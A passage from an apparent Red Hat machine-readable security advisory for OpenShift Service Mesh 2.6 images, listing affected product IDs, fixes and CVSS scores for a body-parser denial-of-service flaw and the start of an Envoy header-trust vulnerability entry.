"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45590", }, { category: "external", summary: "RHBZ#2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45590", url: "https://www.cve.org/CVERecord?id=CVE-2024-45590", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", }, { category: "external", summary: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", url: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", }, { category: "external", summary: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", url: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", }, ], release_date: "2024-09-10T16:15:21.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "body-parser: Denial of Service Vulnerability in body-parser", }, { acknowledgments: [ { names: [ "Mike Whale", ], }, { names: [ "James Force", ], organization: "Red Hat", summary: "This issue was discovered by Red Hat.", }, ], cve: "CVE-2024-45806", cwe: { id: "CWE-639", name: "Authorization Bypass Through User-Controlled Key", }, discovery_date: "2024-09-20T00:40:20.976812+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2313683", }, ], notes: [ { category: "description", text: "A vulnerability was found in Envoy that allows external clients to manipulate Envoy headers, potentially leading to unauthorized access or other malicious actions within the mesh. This issue arises due to Envoy's default configuration of internal trust boundaries, which considers all RFC1918 private address ranges as internal. The default behavior for handling internal addresses in Envoy has been changed. Previously, RFC1918 IP addresses were automatically considered internal, even if the internal_address_config was empty. The default configuration of Envoy will continue to trust internal addresses while in this release and it will not trust them by default in next release. If you have tooling such as probes on your private network which need to be treated as trusted such as changing arbitrary x-envoy headers, please explicitly include those addresses or CIDR ranges into `internal_address_config`. Successful exploitation could allow attackers to bypass security controls, access sensitive data, or disrupt services within the mesh, like Istio.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Potential to manipulate `x-envoy` headers from external sources", title: "Vulnerability summary", }, { category: "other", text: "Red Hat's CVSS score and impact are specific to our product and may not match those of upstream. This is due to how envoy is configured and used within our OpenShift Service Mesh product.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", 